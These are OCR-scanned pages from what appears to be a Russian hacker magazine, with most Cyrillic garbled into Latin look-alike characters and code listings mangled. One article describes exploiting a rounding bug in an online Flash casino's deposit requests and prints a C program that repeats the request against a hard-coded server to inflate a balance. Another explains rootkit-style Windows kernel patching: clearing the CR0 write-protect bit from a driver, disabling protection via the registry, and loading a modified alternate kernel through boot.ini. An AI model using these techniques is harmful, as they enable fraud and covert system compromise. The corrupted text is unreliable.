верить работу внешнего программного обеспе- 
чения, протоколов и ІІазЬ-программ. 



Засада 

Третий день засады. Цитадель молчит, но и я не 
промах. На четвертый день картина стала про- 
ясняться. Оказалось, что у цитадели есть мно- 
жество мобильных отрядов, которые могут сво- 
бодно перемещаться на удаленные графства 
с помощью специальных РІазЬ-платформ. Эти 
отряды собирают дань весьма интересным спо- 
собом: они предлагают жителям графств вло- 
жить их золотые монеты в выгодное дело, кото- 
рое впоследствии должно принести огромные 
дивиденды. Чтобы лучше втесаться в доверие к 
гражданам, для начала они предлагают попро- 
бовать такое вложение, например, на птичьем 
помете, при этом сами предлагают каждому в 
подарок по 1000 кг этой гадости. Доверчивые 
граждане вкладывают подаренное им имущес- 
тво и богатеют: на 1 кг вложений они получают 
10 кг чистого дер$ма. Но когда прибыль уже 
некуда девать, граждане начинают вкладывать 
не птичий помет, а золотые монеты. Вот тут-то 
и кроется обман. Оказывается, дивиденды на 



золото совсем не идут, а наоборот, вложенное 
золото просто исчезает. Да уж, печальная кар- 
тина. Я в свое время тоже попадался на такие 
уловки. Я пытался бороться, подсовывал моне- 
ты с отрицательным достоинством (-50), пытал- 
ся переполнить их золотом, указывая большие 
числа. Это не дало никакого результата. Но 
одно «но» не давало мне покоя. Ты, наверное, 
тоже задался вопросом: а как мобильные отря- 
ды перевозят золото? Вот она, зацепка! ! ! Нуж- 
но узнать, как они это делают, где его хранят, 
каким образом учитывают.Я просидел в засаде 
еще несколько дней, и мне стало понятно, что 
мобильные отряды возят часть на- 
личности, принадлежащей 
доверчивому гражданину, 
с собой, но только ту часть, 
которая необходима ему для 
участия в деле. Для безопас- 
ности они сообщают на базу (в 
цитадель) результаты всех своих 
махинаций, и именно там тошно- 
тики-бухгалтеры ведут все рас- 
четы. В любой момент по первому 
требованию они готовы принять или отправить 
нужное количество птичьего помета. В своих 
злодеяниях они на столько обнаглели, что даже 
не заботились о шифровании передачи сооб- 
щений, используя в качестве транспорта обыч- 
ного посыльного. Внедрив своего спецагента, 
мне удалось легко перехватить достаточное 
количество сообщений для детального анали- 
за. Простота и тупость этих сообщений прямо 
пропорциональна жадности самих хозяев. Я 
даже приведу пример наиболее интересного 
сообщения, оно написано на древнеиндийском 
языке: 

(ЗЕТ Гііір://дате. ЬІЬеі. ги/датез/сазіпо. рЬр?сІерозіі= 1 0 
0&посасЬе=40361 1 9973&зупс= 1 0025&рЬрзеззісІ= 1 75 
4332441 НТТР/1.1 

Как видишь, здесь все очень примитивно: 
посасИе в каждом запросе принимает случай- 
ное значение. Судя по названию, предназначе- 



третий день засады. 

ЦИТАДЕЛЬ МОЛЧИТ, 

НО И Я НЕ ПРОМАХ. 
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Робот-воин (исходный текст) 

//Для запуска требуется файл с заголовком 
//НТТР-запроса 

// Формат запуска сазіпо.ехе <зупс_ісІ> <ІехЦпеасІег> 
// зупс_ісІ - последующее значение поля зупс 
// ІехЦпеасІег - имя файла с заголовком Иіір-запроса 
без самого запроса 
#іпсІисІе <\л/іпзоск2.И> 

#іпсІисІе <зіс^о.Іп> ■ ■ ■ + 

#іпсІІюІе»,<іо.Іт> в і. 

+ ■ ■ ■ 4 

#іп®ІисІе сіспіі.1» 



сітаг !іІе_ІтеасІег[1 024]; 
сітаг ИПр_деі[1024]; 
Іопдзупс; 

ЗОСКАООВ_ІІ\І за; 

ѴѴЗАОАТАѵѵза; 

іпіоиі; 

іпіегг; 

сИагЬи^бб]; 



і, ( (агдс<Э) 

рпп^С'Цваде: с^іпд,ехе <зуЬс_ІД> <іех^1теабег>"); 



* #щсІисІе <Йоп(р.Гі> ■ * 

* , ’ * , ******* 

іпі тЬіпПпіагдс, #баі*агдѵ[])* 

І * Щ _ - * 



# ■ , * * , # 

* зупс=аІоі{аг5(у[1]); * щ 

‘ л . іД\А/3 , А34агіир(МАКЕМѴОРО(Лі),^ѵѵза)) * і 



тетзеі(&за,0,зІ2ео^(ЗОСКАООР)); 
за.зіп_1 : атіІу=АР_ІМЕТ ; 
за.зіп_рогЫтіопз(80); 

за.зіп_аббг.3_ип.3_аббг=іпеі_аббг("21 7.74.42. 151"); 

іпИТ; 

іп1і=0; 

!=ореп(агдѵ[2],О^ІМАВѴІО_РЮОІ\ІІ_Ѵ); 

■ ѵѵбіІе(!_ео^)) _ 



геаРфШіІе_Ьеавег[і++],1); * 

* « , 1 * * * * 

рйіа беаае#++1=0; * 




страницы, то есть внесение случайности в стро- 
ку запроса, делая ееуникальной (какоказалось 
впоследствии, ее можно проигнорировать и ос- 
тавить постоянной). 

рИрзеззіб — идентификатор сессии. Это уни- 
кальный позывной мобильного отряда, 
зупс — порядковый номер сообщения. Видимо, 
он нужен для того, чтобы вражеские бухгалте- 
ры не ошиблись при учете казны. Но бухгалте- 
ры тоже оказались недалекими людьми. Если 
вдруг отряд ошибался с порядковым номером 
(аэто, впринципе, невозможно), то они вежливо 
ему сообщали об этом, вместо того чтобы бить 
тревогу. В качестве ответа приходит обычный 
РОЗТ-запрос: 

рбрзеззісІ=1 754332441 &зупс=10026&ѵаІиіе=Щп&дат 
е=9&сазб=400&РІауег=СазіпоСгаскег&казза=Операц 
ия выполнена&асс=600&стсІз=&датеісІ=1 145191524 
270079&сІопе=1 

Без комментариев. Тут даже дураку понятно, 
что для чего. Обратите внимание на перемен- 
ные сазб и асе. В них указывается количество 
дерьма, находящегося в цитадели и в отряде. 
Прикинувшись простолюдином, я решил не- 
много поиздеваться. Вступив в сделку с отря- 
дом под громким названием ^екз ог ВеДег, я 
получил подарок в размере 1000 (вероятно 
кг) отборного говна. Издевательство заклю- 
чалось в том, что я сначала брал их хваленое 
дерьмо, а потом тутже возвращал, при этом не 
все, а по частям. Само собой, отряд после каж- 
дой операции все сообщал на базу. Я заметил, 
что сумма выданного и возвращенного птичь- 



его помета указывалась в поле берозір в виде 
отрицательного или положительного числа. 
Подведем итог. Отряды постоянно отсылают 
сообщения о результатах своих операций на 
базу. Одной из таких операций является прием 
и передача птичьего помета (ну и золотых мо- 
неттоже) на базу и обратно, причем эту опера- 
циюони выполняютсколькоугоднораз, попер- 
вому требованию доверчивого гражданина. 
Сообщение передается на древнеиндийском 
языке, в котором содержится фраза берозір 
указывающая на количество передаваемых 
средств. Направление передачи определяет- 
ся знаком числа, то есть отрицательное число 
- с базы к отряду, положительное — наоборот. 
Ну что, картина прояснилась, осталось найти 
ошибку и наказать злодеев по заслугам. 

Атака 

Выходим иззасады и переходим крешительным 
действиям. Еще, сидя в засаде и анализируя 
работу отрядов, я заподозрил наличие ошиб- 
ки, которая достаточно распространена при 
работе с денежными средствами. И первая же 
проверка подтвердила мои подозрения, но не 
будем торопиться и рассмотрим все по порядку. 
Во-первых, как ты догадался, мне не составило 
никакого труда замаскироваться под один из 
мобильных отрядов врага. В ближайшей служ- 
бе доставки я нанял посыльного и от имени 
отряда послал запрос в цитадель на доставку 
птичьего помета в количестве 0,001 :. 

ОЕТ Гіі1р://дате.ІпіЬеі.ги/датез/сазіпо.рІпр?сІерозіі=0.0 
01&посасЬе=40361 19973&зупс=10026&рІпрзеззісІ=17 
54332441 НТТР/1.1 



В ответ посыльный принес мне заказанное ко- 
личество вонючей субстанции и сообщение, в 
котором говорилось, что сумма в отряде увели- 
чена на 0,001 , а вот та, что хранится в цитадели, 
не изменилась!!! 

рбрзеззісІ= 1 754332441 &зупс=1 0027&ѵаІиіе=Іи 
п&дате=9&сазИ=400&РІауег=СазіпоСгаскег& 
казза=Операция выполнена&асс=600.001 &ст 
бз=&датеісІ=1 145191524270079&сІопе=1 

Вот оно! ! ! То, что мы искали! ! ! Теперь мы смо- 
жем наказать супостата за разорение доверчи- 
вых граждан. Все, что нам осталось для дости- 
жения цели, — это создать секретное оружие и 
применить его. Нашим секретным оружием бу- 
дет робот-воин, который сможет сам нанимать 
посыльного и отправлять сообщение с требо- 
ванием выдачи 0,001 помета. Не буду вдаваться 
в технические подробности — просто посмотри 
на листинг программы. Робот для работы требу- 
ет два параметра: 

1 .Текущее значение параметра зупс. 

2 . Имя файла, содержащего часть передавае- 
мого ИДр-пакета. 

Файл, имя которого передается во втором па- 
раметре, содержит недостающие фразы для 
создания предложения на древнеиндийском 
языке. Как ты, наверное, заметил, мой робот 
в качестве двигателя использует энергию от- 
крывающихся окон, но я думаю, ты без труда 
сможешь его переделать под упряжку резвых 
пингвинов. Решающий момент — запуск робо- 
та, [Епіег] — и все. Пока наш робот резвится, 
давай поразмыслим, где ошибся жадный влас- 
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титѳль цитадели. А ошибся он, скорее всего, 
где-то между бухгалтерами, казначеями и 
службой обработки входящих сообщений. 
Вероятно, служба обработки, принимая заказ 
на отправку помета, передавала его сразу в 
казначейство и в бухгалтерию. Первые на 
основании требования выдавали нужное ко- 
личество, а вот вторые перед оформлением 
операции сначала округляли запрос до сотых, 
а только потом проводили операцию. В ре- 
зультате казначеи выдавали 0,001, а бухгал- 
теры, при оформлении документов, округляли 
и получали 0,00, а потом вычитали. Вот такая 
математика. Теперь посмотрим на работу 
робота. Ты посмотри, какой молодец, за час 
работы увеличил наш счет до 20-ти единиц, а 
ведь если вкладывать не птичий помет, азоло- 
то, то можно неплохо разбогатеть. Итак, спра- 
ведливость восторжествовала, враг паникует 
и готов сдаться. 

Эпилог 

Наши победили, народ ликует, пошли титры. 
Но мы не в Голливуде, и настоящая жизнь 
очень редко балует нас хэппиендами. Если ты 
еще раз прочитаешь введение, то вспомнишь, 
что мы просто хотели честно заработать, ис- 
пользуя свой интеллект. Я думаю, ты согла- 
сишься с тем, что для казино такие ошибки 
чреваты серьезными последствиями, и опла- 
та за их нахождение должна быть достойной. 
Но у жадных людей свои взгляды на жизнь, и 
они оценили эту ошибку в 50 у.е. Что же полу- 
чается? Ато, что цитадель алчности победила, 
она получила аудит ПО с указанием найден- 
ных ошибок (представлена всего одна, но до- 
статочно значимая) всего за 50 баков! з: 



а РІазИ — это технология 
веб -мультипликации 
и создания интерак- 
тивного контента ком- 
пании от Мааготесііа, 
получившая широкое распро- 
странение. Применяется при 
создании анимационных за- 
ставок, веб-игр и интерактив- 
ных элементов сайта. 



а ІЧтар — это не единс- 
твенная программа 
для сканирования сети 
и ее компонентов, но 
зато одна из лучших, 
к тому же бесплатная. Кро- 
ме птар, я бы порекомендо- 
вал еще Х5рісІег от компании 
Розіііѵе ТесНпоІодіее (ѵѵѵт. 
різесигііѵ.гиі . У них есть плат- 
ная и бесплатная версии. 




На нашем диске ты 
найдешь полные вер- 
сии программ, описан- 
ных в этой статье 



Средневековый словарь терми- 
нов 

Лазутчик — птар, программа, предназна- 
ченная для сканирования сети. 

Начальник охраны — системный админис- 
тратор. 

Разрушающее заклятие — эксплоит 
(ехріоіі). 

Мобильные отряды — программная реали- 
зация азартных игр, созданных с использо- 
ванием технологии РІазИ. 

Удаленные графства — компьютеры поль- 
зователей. 

Выгодное дело — электронные азартные 
игры, такие как рулетка, ВІасЮаск, покер, 
кено и другие. 

Доверчивый гражданин — это ты, если хоть 
раз играл в интернет-казино, или твой друг. 
Птичий помет — виртуальные денежные 
средства, не имеющие никакой ценности. 
Казино называет их РІМ 
Золото или золотые монеты — реальные 
денежные средства, расположенные на 
электронном счете казино. 

Посыльный — ИДр- протокол. 

Спецагент — программа НйрОеІесІ, позво- 
ляющая перехватывать полный текст тран- 
закции (запрос и ответ) между ѴѴЕВ-серве- 
ром и ѴѴЕВ-браузером. 

Древнеиндийский язык — (ЗЕТ -запрос, один 
из способов реализации НТТР-протокола. 
Служба доставки — ѴѴЕВ-браузер. 
Воин-робот — программа, использующая 
найденную ошибку для увеличения игрово- 
го счета. 
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Прежде чем вторгаться в ядро, попробуем разобраться, зачем это вообще 
нужной нельзя ли обойтись «демократичным» прикладным уровнем. 
Черви, вирусы и гооікіі’ы стремятся в ядро затем, чтобы дотянуться до 
функций, работающих с памятью, файлами, сетевыми соединениями 
и процессами на самом низком уровне, перехватив которые, можно 
надежно замаскировать свое присутствие в системе. Аналогичными 
приемами пользуются протекторы исполняемых файлов типа ТИетіба 
(бывший еХІгете Ргоіесіог) и защиты лазерных дисков от копирования 
(Зіаг-Рогсе, 80ЫУ и т. д.). Методика та же самая, что и в ЗіеаШп-виру- 
сах 1 0-1 5-летней давности, только программные реализации другие. 
Кстати говоря, после громкого скандала и судебного разбирательства 
ЗОІМѴ признала свою неправоту, отозвав свыше 30-ти наименований 
защищенных дисков. А ребята из Зіаг-Рогсе продолжают использовать 
вирусные методики, до сих пор регулярно роняя пользовательские 
системы в голубой экран и отказываясь работать с новыми версиями 
ѴѴіпбоѵѵз без обновления самой 3*аг-Рогсе. 

Методы модификации ядра 

Перехват системных функций, взлом защитных механизмов — все 
эти действия требуют модификации ядра, сосредоточенного в файле 
піозкгпі.ехе. Модифицировать ядро можно как на диске (оІМіпе раІсИ), 
так и в памяти (оп-Ііпе раІсН). Каждый способ имеет свои достоинства 
и недостатки, поэтому опытный хакер должен в равной мере владеть и 
тем, и другим. 

Оп-Ііпе раІсН возможен только из драйвера или из прикладного режима 
через псевдоустройство \Оеѵісе\РИузісаІМетогу, которое вплоть до 
ѴѴіпбоѵѵз 2003 Зегѵег ЗР1 было доступно администратору, а после 
закрыто даже для пользователя типа «зузіет» (см. ѵѵѵѵѵѵ.тісгозоіі.сот/ 
1есИпе1/ргоб1есИпоІ/ѵѵіпбоѵѵззегѵег2003/ІіЬгагѵ/ВоокоІ5Р1/е0Ш62аЗ- 
Ьіі 6-4а48-Ьеа5-І2004б1 2се35.тзрх . заметка под именем СИапдез Іо 
Рипсііопаіііу іп МісгозоІІ ѴѴіпбоѵѵз Зегѵег 2003 Зегѵісе Раск 1 ОеѵісеХ 
РИузісаІМетогу ОЬіесІ;). Драйвера (и тем более прикладные програм- 
мы!) грузятся после ядра, которое их может вообще не грузить, если 



отсутствует цифровая подпись, или ядру что-то «не нравится». Кроме 
того, любой успешно загруженный драйвер может заблокировать 
загрузку всех последующих или помешать им осуществить перехват 
системных функций, равно как и любую другую намеченную ими опера- 
цию. В борьбе с малварью и антивирусными сторожами очередность 
загрузки становится очень актуальной, но ни у одной из сторон нет 
1 00% гарантии того, что ее драйвер загрузится первым. К тому же, если 
ядро сообщает о завершении испытательного срока или отправляет 
систему в гебооі еще до загрузки любых драйверов (что практикова- 
лось в ранних версиях І\ІТ), никакой оп-Ііпе раІсН тут не поможет! Кстати 
говоря, факт вмешательства в ядро легко обнаруживается тривиаль- 
ным сравнением образа піозкгпі.ехе с дисковым файлом. Дезакти- 
вация перехвата осуществляется восстановлением «испорченных» 
байт, позаимствованных из оригинала. И хотя перехватчик, желающий 
остаться незамеченным, может (и должен!) отслеживать все обраще- 
ния к піозкгпі.ехе — многие разработчики об этом забывают... 

ОІІ-Ііпе раІсН правит ядро (и, при необходимости, другие файлы) еще до 
его загрузки в память, что придает исправлениям этого типа наивыс- 
ший приоритет. Полномочия оІМіпе патчера практически ничем не ог- 
раничены, и для модификации ядра всего лишь требуется иметь права 
администратора на локальной машине. Доступ к файлу системой не 
блокируется (!), а изменения вступают в силу сразу же после перезаг- 
рузки, которую с администраторскими правами устроить очень легко, 
хоть и не всегда удобно. В тех случаях, когда перезагрузка неуместна 
или нежелательна, прибегают к оп-Ііпе раІсН’у с динамической загруз- 
кой драйвера. Естественно, правка піозкгпі.ехе встречает сопротивле- 
ние со стороны ЗРС, но эту проблему можно решить, даже не отключая 
ЗРС (и чуть позже мы покажем как). Хуже другое: если несколько 
программ начинают править ядро, то образуется такая мешанина, что 
система впадает в голубой экран или начинает вести себя совершенно 
неадекватно. Также необходимо позаботиться о том, чтобы установка 
новых пакетов обновления (то есть Зегѵісе Раск’ов) не конфликтовала 
с хакнутым ядром. В общем, здесь есть, о чем поговорить! 
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Оп-Ііпе раісН 

Даже находясь в нулевом кольце, непосредственно модифицировать 
память, принадлежащую ядру, нельзя. Дело в том, что все драйвера выпол- 
няются в едином адресном пространстве, общим с ядром, и без защиты от 
непредумышленной записи система постоянно страдала бы от некоррект- 
но работающих драйверов, спроектированных непонятно кем. 

Как и любую другую защиту от непреднамеренного доступа, запрет 
на модификацию ядерной памяти можно отключить. Существует, по 
меньше мере, два документированных способа сделать это: статичес- 
кий и динамический. 

Статическое отключение защиты сводится к созданию параметра 
ЕпІогсеѴѴгіІеРгоІесІіоп типа РЕСДЭѴѴОРО со значением Об в следующем 
разделе системного реестра НКЕМ\ЗѴЗТЕМ\СиггепЮопІгоІ5е1\СопІгоІ\ 
ЗеззіопМападеіЛМетогуМападетепІ, после чего ядро, но не приклад- 
ная программа может модифицировать любой драйвер. 

Основной недостаток этого способа в том, что некоторые сторожа сле- 
дят за этой веткой, и стоит только тронуть ее, как они поднимают дикий 
визг, а то и просто молчаливо удаляют ЕпІогсеѴѴгіІеРгоІесІіоп, возвра- 
щая защиту назад. С другой стороны, некоторые честные программы, 
например тот же ЗоЙІСЕ, именно так и работают, поэтому слишком 
ретивые сторожа рискуют отправиться в мусорную корзину, где им 
самое место. Правда, подавляющее большинство нормальных людей с 
ЗоЙІСЕ не работают, и статическое отключение защиты им ни к чему. 
Динамическое отключение защиты осуществляется сбросом ѴѴР-бита 
в управляющем регистре СРО, который так и расшифровывается 
— ѴѴгіІе Ргоіесііоп. Соответственно, повторная установка бита обратно 
включает защиту. 

Ниже приведен код псевдодрайвера, временно отключающего защиту 
памяти ядра от записи, а затем включающего ее назад. «Псевдо» 
потому, что настоящие драйвера (в подлинном смысле этого слова) 
используются для управления реальными (или виртуальными) устройс- 
твами, а нам драйвер понадобится только для того, чтобы дорваться 
до нулевого кольца. Поэтому мы используем одну лишь процедуру 



Статическое отключение зашиты памяти ялра через реестр 



ОгіѵегЕпІгу и тут же возвращаем ЗТАТІІЗ_ОЕѴІСЕ_СОМРІ(ЗІІРАТІОМ_ 
ЕРРОР, сообщая о фиктивной ошибке, заставляющую систему выгру- 
зить драйвер, чтобы он понапрасну не болтался в памяти. Загрузить 
же драйвер можно либо обычным путем (через реестр), либо через 
динамический загрузчик Свена Шрайбера, прилагаемый к его книге 
«Недокументированные возможности ѴѴіпбоѵѵз 2000» (сам загрузчик 
можно найти на ѴѴАЗМ'е): 
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г\од псевдодрайвера кгпІѴѴР.азт, временно отключающего защиту ядра от модифи- 
кации, а затем включающего ее обратно 
.386 

.тобеІМ, зісісаіі 
.сосіе 

ОгіѵегЕпігу ргос 

тоѵ еах, сгО ; грузим управляющий регистр сгО в регистр еах 

тоѵ еЬх, еах ; сохраняем бит ѴѴР в регистре еЬх 

апб еах, ОРРРЕРРРРГі ; сбрасываем бит ѴѴР, запрещающий запись 

тоѵ сгО, еах ; обновляем управляющий регистр сгО 

; #теперь защита отключена! 

; # делаем все, что задумали сделать 
; # модифицируя память ядра по своему усмотрению, 

тоѵ сгО, еЬх ; восстанавливаем бит ѴѴР 

; # защита снова включена! 

тоѵ еах, 0000001826 ; ЗТАТиЗ_ОЕѴІСЕ_СОМРІОиРАТІОМ_ЕРРОР 

геі 

ОгіѵегЕпІгуепсІр 

Для компиляции драйвера потребуется ООК. Во времена ѴѴіпбоѵѵз 
2000 он раздавался бесплатно всем желающим, но затем МісгозоЙ 
сменила политику, и теперь его могут получить только подписчики 
МЗОЫ или почетные погонщики ослов. На самом деле все не так уж и 
печально. И полноценный ООК (вместе с частью ЗОК) входит теперь в 
объединенный пакет КегпеІ-Мобе Огіѵег Ргатеѵѵогк, который пока еще 
распространяется бесплатно, так что спешите качать: ѵѵѵѵѵѵ.тісгозоіі. 
сот/ѵѵІібс/бгіѵег/ѵѵбІ/КМРР рка.тзрх . 

Сама компиляция осуществляется следующими ключами командной 
строки: 

Компиляция псевдодрайвера 
ті /поіодо /с /соЯ кгпІѴѴР.азт 

Ііпк/бгіѵег/Ьазе:0х10000 /аІідп:32/ои1::ктІѴѴР.зуз /зиЬзузІеттаііѵе 
кгпІѴѴР.оЬі 



Модифицируя код или данные ядра, необходимо быть на 1 00% 
уверенным, что в настоящий момент их не использует никакой другой 
поток. Невыполнение этого условия приводит к непредсказуемому 
поведению системы. В лучшем случае — к голубому экрану, в худшем 
— к потере всего дискового тома (особенно, если мы вмешиваемся в 
файловые операции). Проблема возникает как на многопроцессорных, 
так и на однопроцессорных системах без поддержки Нурег Неабіпд, 
причем универсальных путей выхода из ситуации не существует. 
Каждый случай требует индивидуального подхода, описание которого 
тянет на целую статью, и поэтому здесь не рассматривается. 

Анализ исходных текстов (или драйверов) великих гуру далеко не всег- 
да идет на пользу начинающим хакерам. На то они и гуру, чтобы знать, 
какими трюками когда можно пользоваться, а когда — нет. Начинаю- 
щие же обычно запоминают лишь сам трюк, а о границах его приме- 
нения зачастую даже не догадываются. В частности, в ранних версиях 
своей утилиты ОЬдѴіеѵѵ Марк Руссинович вставлял в начало ядерной 
функции ОЬдРгіпд команду перехода на свой обработчик: 

Перехват отладочного вывода 
тоѵ еах, оТСзеІ Іос_1 0АО4 цтр:ОЬдРгіп1: 
тоѵ еах, [еах+2] ; операнд ітр: [ОЬдРгіпІ] 
тоѵ _рОЬдРгп, еах 

тоѵ есх, [еах] ; ОЬдРгіпІ 

тоѵ _рОЬдРгп, есх 

тоѵ аі, [есх+1] ; второй байт ОЬдРгіпІ 

стр аі, 80Гі ; РІІЗН ЕВР/МОѴ ЕВР.ЕЗР 

ІП2 зГюгііос_10666 

Поскольку функция ОЬдРгіпІ не относится к числу интенсивно вызывае- 
мых, то вероятность, что какой-то поток вызовет ее одновременно с 
установкой перехватчика, достаточно невелика, и все «как бы» рабо- 
тает. Однако, если один или несколько драйверов начнут злоупотреб- 
лять отладочным выводом, вероятность краха системы значительно 
возрастет, поэтому в последующих версиях Руссинович отказался 
от небезопасного способа перехвата и перешел на модификацию 
таблицы экспорта піозкгпі.ехе. Новичкам, похитившим этот пример и 
попытавшимся употребить его для перехвата функций ввода/вывода, 
пришлось намного хуже, и голубые экраны выпрыгивали только так! 




Бесплатно раздавае- 
мый КегпеІ-МосІе Ргіѵег 
Ргатеѵѵогк. в состав ко- 
торого вхопит РРК 



Результат правки піозкгпі. 
ехе без пересчета конт- 
рольной СУММЫ 



9 

На РУР ты найдешь полную 
статью, раскрывающую все та- 
инства и секреты ядра ІМТ, в том 
числе руководство по ручному 
хаку загрузочного логотипа 
ѴѴіпбоѵѵз 
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выбор япео 




Оіі-Ііпе раІсГі 

Кромсать ядро статическим способом очень просто. Открываем файл 
піозкгпі.ехе функций СгеаІеРіІе, а затем действуем через РеасІРіІе/ 
ѴѴгіІеРіІе. Проблема синхронизации потоков отпадает сама собой, 
поскольку правка осуществляется еще до загрузки образа в память, 
однако техника перехвата от этого ничуть не упрощается. Ведь, чтобы 
записать фтр поверх ядерной функции или подменить таблицу экс- 
порта, необходимо явным образом указать адрес нашего обработчика 
(расположенного, как правило, в драйвере), но на момент статической 
правки ядра местоположение драйвера в памяти еще неизвестно! ! ! 
Приходится шаманить. РІапример, можно поступить так: найти в ядре 
свободное место и внедрить туда крошечный перехватчик-диспетчер, 
определяющий, был ли загружен «наш» драйвер. Если нет — управ- 
ление возвращается оригинальным ядерным функциям, в противном 
случае — нашему драйверу. При перехвате нескольких функций 
диспетчер должен смотреть, откуда приходит вызов и какой процедуре 
драйвера их следует передавать. Вот почему вместо фтр’а програм- 
мисты используют саІІ. Диспетчер стягивает с вершины стека адрес 
возврата, смотрит, откуда пришел вызов, и все понимает. 

При желании код перехватчика можно полностью реализовать в ядре 
(если, конечно, это не очень сложный перехватчик) или загрузить свой 
собственный драйвер, однако делать это можно лишь тогда, когда 
исполнительная система уже функционирует, дисковые тома смонти- 
рованы, файловые системы опознаны и соответствующие им драйвера 
готовы к работе. Другими словами, принудительная загрузка «своих» 
драйверов из ядра возможна только на поздних стадиях инициализа- 
ции операционной системы (а к этому времени вирусы, встроившиеся в 
ядро, могли давным-давно захватить управление, обламывая загрузку 
антивируса по полной программе). 

После любой модификации системных файлов необходимо пере- 
считать их контрольную сумму, иначе ЫТ (в отличие от ѴѴіпбоѵѵз 98) 
откажется их загружать. Правда, в «безопасном режиме» по Р8они 
загружаются, но это все-таки не то. 

Для этих целей можно воспользоваться утилитой ЕОІТВІІМ, входящей в 
состав РІаІІогт 80К и МісгозоЙ ѴізиаІ Зіисііо. Командная строка выгля- 
дит так: 

есІШэіп.ехе /РЕЬЕАЗЕ ЯІепате.ехе 

Естественно, не стоит забывать о такой штуке, как 8ЕС, норовящей 
автоматически (или вручную) восстановить измененные файлы. И 
хотя 8ЕС легко усмирить (отключить или синхронизовать измененный 
системный файл с его «эталонным» оригиналом, хранящимся в кэше), 
это не решит всех проблем. 

При установке очередного пакета обновления, затрагивающего ядро, 
инсталлятор просто не поймет, что это за версия такая и откуда она 
вообще взялась. В результате установка прервется на середине. Пос- 
ле перезагрузки система умрет, и конечному пользователю придется 
заниматься ее реанимацией (подробнее об этом можно прочитать на 
блоге Раймонда Чена ОІсІ ЫеѵѵТІііпа: ИДр://Ыоаз.тзсІп.сот/оІсІпеѵѵ1Іііпа/ 



:) 

Несколько интересных ресурсов по теме: 
Іійр://\ллллл/.доѵегптепгзесигИѵ.огд/агсІііѵеЛ3741 .Іііті 
ИДр://ѵ\лл/ѵѵ.аеосШе5.сотДИеііоеІс/ХРЬооІсоІог5.Іі!тІ 
ІпДр://\л/\л/\л/.ІіДІе\л/Ііі^есІоа.сот/соЩеп1-9.ІіІтІ 



агсЫѵе/2003/08/05/54603.азрх Ѵ 
Для вирусов такой прием, быть может, и подходит, 
но для коммерческих программ он неприемлем в 
принципе ! К счастью, существует одна интересная 
лазейка — возможность прописать в Ьооі.іпі-файле 
альтернативное ядро, которое и будет загружаться. » 
Тогда оригинальный піозкгпі.ехе можно оставить в 
неприкосновенности. Ни ЗРС, ни инсталлятор пакетов 
обновления протестовать не будут, что есть гуд. Авотто, что обновле- 
ние затронет «пассивное» оригинальное ядро — уже нехорошо. Может 
возникнуть конфликт старого ядра с новым окружением (то же самое 
произойдет и при удалении пакета обновления), поэтому необходимо 
автоматически (или хотя бы вручную) отслеживать смену ядер, копиро- 
вать піозкгпі.ехе поверх альтернативного ядра и заново его модифици- 
ровать. Довольно геморройный путь, но в некоторых случаях без него 
не обойтись, поэтому рассмотрим его во всех подробностях, тем более 
что, несмотря на кажущуюся простоту операции, подводных камней 
здесь предостаточно. 

Первым делом скопируем файл піозкгпі.ехе (он находится в папке 
8узІет32) в... ну, например, в піозктб.ехе. Затем найдем в корневом 
каталоге системного диска (которым, как правило, является диск С:) 
файл Ьооі.іпі и откроем его в РАР’е по <Р4> или любом другом подходя- 
щем редакторе: 

Типичное содержимое файла Ьооі.іпі 

[Ьооі Іоасіег] 

іітеоиЬЗО 

с1е1 : аи11:=тиШ(0)сМзк(0)гсП5к(0)раг1:Шоп(1 ДѴѴІЫЫТ 
[орегаііпд зузіетз] 

тиШ(0)сІізк(0)гсІізк(0)раг1:і1:іоп(1 ДѴѴІМЫТ =”ѴѴ2К Рго ПІІЗ” ДазШеіесі 

Продублируем (сору-п-разіе) строку, находящуюся в секции [орегаііпд 
зузіет], и добавим кней ключ «/кегпеІ=піозкгІі.ехе», где пІозкгН.ехе — имя 
альтернативного ядра. Также изменим текст, заключенный в кавычки, 
дописав сюда «ИаскесІ» или что-то свое. Главное, чтобы при загрузке 
можно было отличить основное ядро от альтернативного. 

Модифицированный Ьооі.іпі, предоставляющий возможность выбора ядер 

[Ьооі Іоасіег] 

іітеоиЬЗО 

сІеі : аиІ1:=тиІ1:і(0)сІізк(0)гсІізк(0)раг1:і1:іоп(1 )\\Л/1МЫТ 
[орегаііпд зузіетз] 

тиШ(0)бізк(0)гЦізк(0)рагІІІіоп(1 )\ѴѴІІ\ІІ\ІТ =”ѴѴ2К Рго” Дазісіеіесі 
тиІ1:і(0)сІізк(0)гсІізк(0)раг1:і1:іоп(1 )\\Л/1МЫТ =”ѴѴ2К ІпаскесІ” Дазісіеіесі /кетеНпІозкгІт 
ехе 

При загрузке системы возникнет меню, предлагающее нам одно из 
двух ядер на выбор. Убедившись, что оба ядра исправно работают, 
удовлетворенные, мы начинаем хакерстовать. Открываем піозкгпб.ехе 
(альтернативное ядро) в Иіеѵѵ’е и вносим в него какие-нибудь несу- 
щественные изменения. Например, находим последовательность 90И 
90И (ЫОР/ЫОР) и меняем ее на 87И С9И (ХСНО ЕСХ,ЕСХ), сохраняем 
изменения по <Р9> и перезагружаемся . . . 

Упс ! Альтернативное ядро больше не грузится ! Что ж, загружаемся с 




Файл піозкгпіі. ехе по хака 
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При загрузке альтернативного ялра піозкгпіі. ехе. ЗоііІС 
по команле тао32 утверждает, что япоо зовется піозкгп 
в то время как РЕ-ТООІ-5 показывает его настоящее им 
— піозкгпіі. ехе 




Файл піозкгпіі. ехе после хака 



основного, ругая себя всякими словами зато, что забыли пересчитать 
контрольную сумму. Даем команду «ебШэіп /РЕІ_ЕАЗЕ піозкгпіт.ехе» и 
перезагружаемся еще раз. Теперь альтернативное ядро работает как 
ни в чем не бывало, и первую строчку (с оригинальным ядром) из Ьооі. 
іпі можно смело убирать, чтобы загрузочное меню не появлялось при 
каждом запуске системы. Правда, при этом станет невозможна за- 
грузка в безопасном режиме, поскольку ѴѴіпбоѵѵз не вполне корректно 
поддерживает недокументированный ключ /кегпеі и путается в ядрах во 
всех нештатных ситуациях. В данном случае система упорно утвѳржда- 



Попытка загоѵзки системы в «безопасном режиме» с альтер- 
нативным ялром при вопит к краху! 



ет, что файл ШозкгпІ.ехе не найден, хотя он исправно присутствует на 
диске. 

Ладно, попробуем ответить вот на какой вопрос: откуда драйвера узна- 
ют о факте переименования ядра? Ведь в их таблице импорта явно 
прописан піозкгпі.ехе, который (в случае альтернативного ядра) 
может вообще отсутствовать на диске, но тем не менее функции 
экспортируются/импортируются, и все работает, как кремлевские 
часы после путча. Волшебство, да и только! 

